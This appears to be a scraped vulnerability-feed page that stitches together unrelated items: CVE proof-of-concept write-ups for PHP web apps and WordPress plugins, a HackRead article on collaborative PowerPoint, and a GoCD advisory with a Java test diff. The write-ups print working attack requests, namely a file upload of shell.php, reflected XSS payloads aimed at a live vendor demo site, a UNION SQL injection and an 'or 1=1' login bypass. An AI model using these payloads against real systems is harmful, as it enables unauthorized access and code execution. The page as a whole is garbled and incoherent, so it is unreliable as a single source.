Online Tours & Travels Management System v1.0 is vulnerable to Arbitrary code execution via ip/tour/admin/operations/update_settings.php.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: XD201-MENG@QI

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/update\_settings.php

Loophole location: Online Tours & Travels management system's admin/settings.php file exists arbitrary file upload (RCE)

Request package for file upload:

POST /tour/admin/operations/update\_settings.php?id\=2 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/tour/admin/settings.php
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------248921847826758
Content-Length: 1288
\-----------------------------248921847826758
Content-Disposition: form-data; name="title"
Tours and Travels
\-----------------------------248921847826758
Content-Disposition: form-data; name="f\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img"
favi.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="logo\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img1"
logo\_by NB.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img2"
logo\_by NB.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="currency"
1
\-----------------------------248921847826758
Content-Disposition: form-data; name="footer"
Nikhil B
\-----------------------------248921847826758
Content-Disposition: form-data; name="update"
\-----------------------------248921847826758--

The files will be uploaded to this directory \\tour\\admin\\settings 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-42142: bug_report/RCE-1.md at main · xd201qaz/bug_report

Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to 'big file uploads' to copy/move files from anywhere in the file system into the web directory.

CVE-2022-42029: Security issues - Chamilo LMS

WordPress Photo Gallery plugin version 1.8.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : wordpress.org/plugins/                                                     ││  Vendor   : Photo Gallery Team - wpsofts.com                                           ││  Software : WordPress Photo Gallery 1.8.0                                              ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'pg' is vulnerable to XSSPath: /photo-gallery/https://wpsofts.com/grid-kit-demo/photo-gallery/?pid=47&pg=2&zdifv%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eh18n1=1URL parameter 'pid' is vulnerable to XSSPath: /photo-gallery/https://wpsofts.com/grid-kit-demo/photo-gallery/?pida2sg4%27%2dalert%281%29%2d%27z632u&pg=2[-] Done

WordPress Photo Gallery 1.8.0 Cross Site Scripting

Billing System Project v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /phpinventory/editbrand.php.

Permalink

**Billing System Project v1.0 by mayuri\_k has SQL injection**

BUG\_Author: AuriGe

Login account: mayurik/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /phpinventory/editbrand.php?id=

Vulnerability location: /phpinventory/editbrand.php?id=, id

dbname = store1,length=6

\[+\] Payload: /phpinventory/editbrand.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /phpinventory/editbrand.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-41498: bug_report/SQLi-1.md at main · aurigee/bug_report

A SQL Injection issue in Merchandise Online Store v.1.0 allows an attacker to log in to the admin account.

\# Exploit Title: Merchandise Online Store System - SQL Injection "Unauthorized Admin Access"

\# Exploit Author: Pratik Shetty

\# Vendor Name: oretnom23

\# Vendor Homepage: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

\# Software Link: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

\# Version: v1.0

\# Tested on: Parrot GNU/Linux 4.10, Apache

\# CVE: CVE-2022-42237

Description:-

An SQL injection issue in Merchandise Online Store System v.1.0 allows an attacker to logi in into admin account.

\`

Payload used:-

admin' or 1=1

\`

Parameter:-

Username and Password

\`

Steps to reproduce:-

1\. First go the admin login

2\. From there in username and password put the payload

Payload:

admin' or 1=1

3\. Now press enter and we get logged in into admin account

CVE-2022-42237: sqlinj/poc at main · draco1725/sqlinj

The Import all XML, CSV & TXT WordPress plugin before 6.5.8 does not properly sanitise and escape imported data before using them back SQL statements, leading to SQL injection exploitable by high privilege users such as admin

CVE-2022-3243

The WP Custom Cursors WordPress plugin through 3.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privileged users such as admin

CVE-2022-3150

The Search Logger WordPress plugin through 0.9 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users

CVE-2022-3131

By Owais Sultan
Among the several online presentation-making platforms, Microsoft PowerPoint is the first choice of professionals. The platform allows you…
This is a post from HackRead.com Read the original post: 6 Best Ways to Make a Collaborative PowerPoint Presentation

Among the several online presentation-making platforms, **Microsoft PowerPoint** is the first choice of professionals. The platform allows you complete access to all tools, themes, layouts, and designs that work wonders for your presentation. A presentation with just the right tone, right colors, and simple yet engaging slides will easily win over your audience. 

Hence, a to-the-point presentation with beautiful slides will help you manage the flow of your meeting and remind your audience of essential points. Also, adding slide transitions, charts, graphs, animations, and videos will further enhance your presentation. 

Nowadays, templates have made the life of corporate workers easier. Creating slides from scratch is no longer an option to consider. SlideUpLift provides you with exceptionally well-designed **Google Slides Themes**!  Now you can create visually enthralling presentations with ease. Find the right PowerPoint templates for your presentation from our huge array of PowerPoint templates. 

However, with the present transition of global corporate sectors to online collaboration activities, what happens if you have a group presentation to work on? What if you get a task to work as a team on one presentation? 

Worry not! Microsoft PowerPoint allows you to share your presentation, allowing others to easily make changes and modifications to that one presentation. The platform takes advantage of cloud technology and enables you to collaborate online. What’s more? All of this is super easy to handle and work with! 

Here we are sharing with you the five best ways to make a collaborative presentation on Microsoft PowerPoint. 

What is the first thing to be done in a collaborative PowerPoint presentation? Of course! Share. 

It is pretty simple, **cloud-based**, and secure to share your PowerPoint presentation. You need to enable the privileges to make the file accessible to others who intend to work on the file. Here’s a step-by-step guide to sharing your file:

*   Click on your PowerPoint presentation and open the file.  
    
*   Locate and select the Share button on the window’s top right corner.  
    
*   PowerPoint will show you a prompt dialogue box asking you to save your file on SharePoint Online or OneDrive for business. You can choose from any one of these since both works similarly.  
    
*   Now you will be able to invite people to work on your file, either by email or by an URL.   
    
*   If you choose to email, enter the recipient’s email address. Next, allow the permissions and click the share option.  
    
*   If you choose the Get Link option, you can edit the access permissions and generate the link for sharing with collaborators. 

**2 Check Who Is Working on Which Part of the Presentation**

Once other people start working on the presentation, you will be able to see their profile pictures and name in the top right corner of the window. Also, they will appear on the slide, and their terms and icons will appear next to the slide thumbnails. 

This implies you can effortlessly see who is operating on which part of the presentation. Any and every change is going to save instantly and synced for everyone. Hence, you are assured of getting a seamless presentation design procedure.

**3 Monitor and Track Changes**

Conflicting edits are bound to occur when several people are working together. Whenever any collaborator edits the presentation, the host gets a notification. You can seamlessly track changes and monitor edits in real-time.

When you open the file, you can glimpse the unread modifications. All the details, including who did the editing and when it was saved, will be highlighted in the slides thumbnail panel.

In case of conflicting changes, PowerPoint displays both edits side by side before saving them. This allows you to address these conflicts and resolve them accordingly.

**4 Easily Access the Previous Versions of the Presentation**

The cloud-based PowerPoint presentation sharing also has a facility that allows you to retrieve the previous versions of your file. This will enable you to monitor the file changes over time. Also, this process is automatic and thus requires no separate effort from your end. 

If you want to view the previous versions of your presentation, all you need to do is click on File, Info, and Version History.

**5 Discuss and Negotiate in a Group Chat**

Microsoft PowerPoint allows starting a chat while working on the presentation. Below are the steps you must follow:

*   Find the co-author option next to share.
*   Click on the Join Group Chat button, and you will be able to chat with your collaborators. 

This makes the discussion of ideas super easy and convenient. However, the chat history isn’t saved. It’ll start a new chat altogether every time you close and open your chat. 

Finally, you can write comments beside slides and edits. This can provide direct feedback on the slide and help jot down important discussion points. 

All you need to do is to:

*   Click on the Review tab.
*   Click on New Comment and type your feedback.
*   Once you post the comment, it will appear when you highlight the particular slide element.

Therefore, these are a few ways to share and create a collaborative PowerPoint presentation with your colleagues. Microsoft PowerPoint is one of the fairest forums to do so conveniently and efficiently.

**Summing up**

A PowerPoint presentation may seem pretty basic, but still one of the top choices for any business to convey any message. A good PowerPoint presentation can engage your target audience and will help you convert your potential lead into a potential client. So choose the right platform for an impeccable presentation.

1.  **How To Screencast on Windows 10**
2.  **How to Use OneDrive for Office 365 on Desktop**
3.  **Fix Microsoft Outlook When Stuck on Loading Profile**
4.  **MySQL Performance Tuning: Top 5 Tips for Blazing Fast Queries**
5.  **5 PDF Tricks You Should Know To Improve Document Productivity**

6 Best Ways to Make a Collaborative PowerPoint Presentation

GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 leak the symmetric key used to encrypt/decrypt any secure variables/secrets in GoCD configuration to authenticated agents. A malicious/compromised agent may then expose that key from memory, and potentially allow an attacker the ability to decrypt secrets intended for other agents/environments if they also are able to obtain access to encrypted configuration values from the GoCD server. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds.

@@ -68,8 +68,8 @@ public class TfsMaterialTest { @BeforeEach void setUp() { GoCipher goCipher = mock(GoCipher.class); tfsMaterialFirstCollectionFirstProject = new TfsMaterial(goCipher, new UrlArgument(TFS\_FIRST\_COLLECTION\_URL), USERNAME, DOMAIN, PASSWORD, TFS\_FIRST\_PROJECT); tfsMaterialFirstCollectionSecondProject = new TfsMaterial(goCipher, new UrlArgument(TFS\_FIRST\_COLLECTION\_URL), USERNAME, DOMAIN, PASSWORD, TFS\_SECOND\_PROJECT); tfsMaterialFirstCollectionFirstProject = new TfsMaterial(new UrlArgument(TFS\_FIRST\_COLLECTION\_URL), USERNAME, DOMAIN, PASSWORD, TFS\_FIRST\_PROJECT); tfsMaterialFirstCollectionSecondProject = new TfsMaterial(new UrlArgument(TFS\_FIRST\_COLLECTION\_URL), USERNAME, DOMAIN, PASSWORD, TFS\_SECOND\_PROJECT); }  
@Test @@ -104,7 +104,7 @@ void shouldLoadAllModificationsSinceAGivenRevision() throws IOException {  
@Test void shouldInjectAllRelevantAttributesInSqlCriteriaMap() { TfsMaterial tfsMaterial = new TfsMaterial(new GoCipher(), new UrlArgument("my-url"), "loser", DOMAIN, "foo\_bar\_baz", "/dev/null"); TfsMaterial tfsMaterial = new TfsMaterial(new UrlArgument("my-url"), "loser", DOMAIN, "foo\_bar\_baz", "/dev/null"); assertThat(tfsMaterial.getSqlCriteria()).isEqualTo(m( SQL\_CRITERIA\_TYPE, (Object) "TfsMaterial", "url", "my-url", @@ -114,7 +114,7 @@ void shouldInjectAllRelevantAttributesInSqlCriteriaMap() {  
@Test void shouldInjectAllRelevantAttributesInAttributeMap() { TfsMaterial tfsMaterial = new TfsMaterial(new GoCipher(), new UrlArgument("my-url"), "loser", DOMAIN, "foo\_bar\_baz", "/dev/null"); TfsMaterial tfsMaterial = new TfsMaterial(new UrlArgument("my-url"), "loser", DOMAIN, "foo\_bar\_baz", "/dev/null"); assertThat(tfsMaterial.getAttributesForXml()).isEqualTo(m( AbstractMaterial.SQL\_CRITERIA\_TYPE, (Object) "TfsMaterial", "url", "my-url", @@ -124,56 +124,31 @@ void shouldInjectAllRelevantAttributesInAttributeMap() {  
@Test void shouldReturnUrlForCommandLine\_asUrl\_IfSet() { TfsMaterial tfsMaterial = new TfsMaterial(new GoCipher(), new UrlArgument("http://foo:bar@my-url.com"), "loser", DOMAIN, "foo\_bar\_baz", "/dev/null" TfsMaterial tfsMaterial = new TfsMaterial(new UrlArgument("http://foo:bar@my-url.com"), "loser", DOMAIN, "foo\_bar\_baz", "/dev/null" ); assertThat(tfsMaterial.getUrl()).isEqualTo("http://foo:bar@my-url.com");  
tfsMaterial = new TfsMaterial(new GoCipher(), null, "loser", DOMAIN, "foo\_bar\_baz", "/dev/null"); tfsMaterial = new TfsMaterial(null, "loser", DOMAIN, "foo\_bar\_baz", "/dev/null"); assertThat(tfsMaterial.getUrl()).isNull(); }  
@Test void shouldReturnUrlForCommandLine\_asLocation\_IfSet() { TfsMaterial tfsMaterial = new TfsMaterial(new GoCipher(), new UrlArgument("http://foo:bar@my-url.com"), "loser", DOMAIN, "foo\_bar\_baz", "/dev/null" TfsMaterial tfsMaterial = new TfsMaterial(new UrlArgument("http://foo:bar@my-url.com"), "loser", DOMAIN, "foo\_bar\_baz", "/dev/null" ); assertThat(tfsMaterial.getLocation()).isEqualTo("http://foo:\*\*\*\*\*\*@my-url.com");  
tfsMaterial = new TfsMaterial(new GoCipher(), null, "loser", DOMAIN, "foo\_bar\_baz", "/dev/null"); tfsMaterial = new TfsMaterial(null, "loser", DOMAIN, "foo\_bar\_baz", "/dev/null"); assertThat(tfsMaterial.getLocation()).isNull(); }  
@Test void shouldEncryptTfsPasswordAndMarkPasswordAsNull() throws Exception { GoCipher mockGoCipher = mock(GoCipher.class); when(mockGoCipher.encrypt("password")).thenReturn("encrypted");  
TfsMaterial tfsMaterial = new TfsMaterial(mockGoCipher, new UrlArgument("/foo"), "username", DOMAIN, "password", ""); tfsMaterial.ensureEncrypted();  
assertThat(tfsMaterial.getPassword()).isNull(); assertThat(tfsMaterial.getEncryptedPassword()).isEqualTo("encrypted"); }  
@Test void shouldDecryptTfsPassword() throws Exception { GoCipher mockGoCipher = mock(GoCipher.class); when(mockGoCipher.decrypt("encrypted")).thenReturn("password");  
TfsMaterial tfsMaterial = new TfsMaterial(mockGoCipher, new UrlArgument("/foo"), "username", DOMAIN, null, "");  
ReflectionUtil.setField(tfsMaterial, "encryptedPassword", "encrypted");  
tfsMaterial.ensureEncrypted(); assertThat(tfsMaterial.getPassword()).isEqualTo("password"); }  
@Test void shouldNotDecryptPasswordIfPasswordIsNotNull() throws Exception { GoCipher mockGoCipher = mock(GoCipher.class); when(mockGoCipher.encrypt("password")).thenReturn("encrypted"); when(mockGoCipher.decrypt("encrypted")).thenReturn("password");  
TfsMaterial material = new TfsMaterial(mockGoCipher, new UrlArgument("/foo"), "username", DOMAIN, "password", ""); TfsMaterial material = new TfsMaterial(new UrlArgument("/foo"), "username", DOMAIN, "password", ""); material.ensureEncrypted(); when(mockGoCipher.encrypt("new\_password")).thenReturn("new\_encrypted"); material.setPassword("new\_password"); @@ -182,33 +157,6 @@ void shouldNotDecryptPasswordIfPasswordIsNotNull() throws Exception { assertThat(material.getPassword()).isEqualTo("new\_password"); }  
@Test void shouldErrorOutIfDecryptionFails() throws CryptoException { GoCipher mockGoCipher = mock(GoCipher.class); String fakeCipherText = "fake cipher text"; when(mockGoCipher.decrypt(fakeCipherText)).thenThrow(new CryptoException("exception")); TfsMaterial material = new TfsMaterial(mockGoCipher, new UrlArgument("/foo"), "username", DOMAIN, "password", ""); ReflectionUtil.setField(material, "encryptedPassword", fakeCipherText); try { material.getPassword(); fail("Should have thrown up"); } catch (Exception e) { assertThat(e.getMessage()).isEqualTo("Could not decrypt the password to get the real password"); } }  
@Test void shouldErrorOutIfEncryptionFails() throws Exception { GoCipher mockGoCipher = mock(GoCipher.class); when(mockGoCipher.encrypt("password")).thenThrow(new CryptoException("exception")); try { new TfsMaterial(mockGoCipher, new UrlArgument("/foo"), "username", DOMAIN, "password", ""); fail("Should have thrown up"); } catch (Exception e) { assertThat(e.getMessage()).isEqualTo("Password encryption failed. Please verify your cipher key."); } }  
@Test void shouldBePasswordAware() { assertThat(PasswordAwareMaterial.class.isAssignableFrom(TfsMaterial.class)).isTrue(); @@ -237,13 +185,13 @@ void shouldCheckConnection() {  
@Test void shouldGetLongDescriptionForMaterial() { TfsMaterial material = new TfsMaterial(new GoCipher(), new UrlArgument("http://url/"), "user", "domain", "password", "$project/path/"); TfsMaterial material = new TfsMaterial(new UrlArgument("http://url/"), "user", "domain", "password", "$project/path/"); assertThat(material.getLongDescription()).isEqualTo("URL: http://url/, Username: user, Domain: domain, ProjectPath: $project/path/"); }  
@Test void shouldCopyOverPasswordWhenConvertingToConfig() throws Exception { TfsMaterial material = new TfsMaterial(new GoCipher(), new UrlArgument("http://url/"), "user", "domain", "password", "$project/path/"); TfsMaterial material = new TfsMaterial(new UrlArgument("http://url/"), "user", "domain", "password", "$project/path/");  
TfsMaterialConfig config = (TfsMaterialConfig) material.config();  
@@ -253,7 +201,7 @@ void shouldCopyOverPasswordWhenConvertingToConfig() throws Exception {  
@Test void shouldGetAttributesWithSecureFields() { TfsMaterial material = new TfsMaterial(new GoCipher(), new UrlArgument("http://username:password@tfsrepo.com"), "username", "domain", "password", "$project/path/"); TfsMaterial material = new TfsMaterial(new UrlArgument("http://username:password@tfsrepo.com"), "username", "domain", "password", "$project/path/"); Map<String, Object\> attributes = material.getAttributes(true);  
assertThat(attributes.get("type")).isEqualTo("tfs"); @@ -267,7 +215,7 @@ void shouldGetAttributesWithSecureFields() {  
@Test void shouldGetAttributesWithoutSecureFields() { TfsMaterial material = new TfsMaterial(new GoCipher(), new UrlArgument("http://username:password@tfsrepo.com"), "username", "domain", "password", "$project/path/"); TfsMaterial material = new TfsMaterial(new UrlArgument("http://username:password@tfsrepo.com"), "username", "domain", "password", "$project/path/"); Map<String, Object\> attributes = material.getAttributes(false);  
assertThat(attributes.get("type")).isEqualTo("tfs"); @@ -283,14 +231,14 @@ void shouldGetAttributesWithoutSecureFields() { class passwordForCommandLine { @Test void shouldReturnPasswordAsConfigured\_IfNotDefinedAsSecretParam() { TfsMaterial tfsMaterial = new TfsMaterial(new GoCipher(), new UrlArgument("some-url"), null, null, "badger", null); TfsMaterial tfsMaterial = new TfsMaterial(new UrlArgument("some-url"), null, null, "badger", null);  
assertThat(tfsMaterial.passwordForCommandLine()).isEqualTo("badger"); }  
@Test void shouldReturnAResolvedPassword\_IfPasswordDefinedAsSecretParam() { TfsMaterial tfsMaterial = new TfsMaterial(new GoCipher(), new UrlArgument("some-url"), null, null, "{{SECRET:\[secret\_config\_id\]\[lookup\_pass\]}}", null); TfsMaterial tfsMaterial = new TfsMaterial(new UrlArgument("some-url"), null, null, "{{SECRET:\[secret\_config\_id\]\[lookup\_pass\]}}", null);  
tfsMaterial.getSecretParams().findFirst("lookup\_pass").ifPresent(secretParam -> secretParam.setValue("resolved\_password"));  
@@ -299,7 +247,7 @@ void shouldReturnAResolvedPassword\_IfPasswordDefinedAsSecretParam() {  
@Test void shouldErrorOutWhenCalledOnAUnResolvedSecretParam\_IfPasswordDefinedAsSecretParam() { TfsMaterial tfsMaterial = new TfsMaterial(new GoCipher(), new UrlArgument("some-url"), null, null, "{{SECRET:\[secret\_config\_id\]\[lookup\_pass\]}}", null); TfsMaterial tfsMaterial = new TfsMaterial(new UrlArgument("some-url"), null, null, "{{SECRET:\[secret\_config\_id\]\[lookup\_pass\]}}", null);  
assertThatCode(tfsMaterial::passwordForCommandLine) .isInstanceOf(UnresolvedSecretParamException.class) @@ -311,7 +259,7 @@ void shouldErrorOutWhenCalledOnAUnResolvedSecretParam\_IfPasswordDefinedAsSecretP class setPassword { @Test void shouldParsePasswordString\_IfDefinedAsSecretParam() { TfsMaterial tfsMaterial = new TfsMaterial(new GoCipher(), new UrlArgument("some-url"), null, null, "{{SECRET:\[secret\_config\_id\]\[lookup\_pass\]}}", null); TfsMaterial tfsMaterial = new TfsMaterial(new UrlArgument("some-url"), null, null, "{{SECRET:\[secret\_config\_id\]\[lookup\_pass\]}}", null);  
assertThat(tfsMaterial.getSecretParams()) .hasSize(1) @@ -339,7 +287,7 @@ void populateEnvContextShouldSetMaterialEnvVars() {  
@Test void shouldOnlyPopulateDomainEnvVarIfPresent() { TfsMaterial material = new TfsMaterial(mock(GoCipher.class), new UrlArgument(TFS\_FIRST\_COLLECTION\_URL), USERNAME, "", PASSWORD, TFS\_FIRST\_PROJECT); TfsMaterial material = new TfsMaterial(new UrlArgument(TFS\_FIRST\_COLLECTION\_URL), USERNAME, "", PASSWORD, TFS\_FIRST\_PROJECT); EnvironmentVariableContext ctx = new EnvironmentVariableContext(); final ArrayList<Modification\> modifications = new ArrayList<>();

Tag

#sql